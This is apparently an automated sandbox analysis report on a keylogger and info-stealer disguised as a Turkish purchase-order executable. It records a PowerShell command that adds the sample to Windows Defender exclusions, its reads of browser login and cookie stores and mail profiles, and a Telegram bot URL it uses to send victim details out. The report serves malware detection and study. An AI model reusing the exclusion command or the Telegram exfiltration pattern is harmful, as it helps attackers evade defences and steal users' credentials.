Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"			Jump to behavior

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"			Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process created: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"			Jump to behavior

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Queries volume information: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Queries volume information: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.15.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	11 Masquerading	1 OS Credential Dumping	31 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	51 Virtualization/Sandbox Evasion	Security Account Manager	51 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	23 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	29%	Virustotal		Browse
SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	34%	ReversingLabs
SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	100%	Avira	HEUR/AGEN.1306911

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.64.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2014/03/2025%20/%2006:54:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B16000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/lB	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.ver)	svchost.exe, 00000005.00000002.2366614968.00000202B9483000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ac.ecosia.org?q=	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000005.00000003.1203600977.00000202B92A0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	false	high
http://upx.sf.net	Amcache.hve.15.dr	false	high
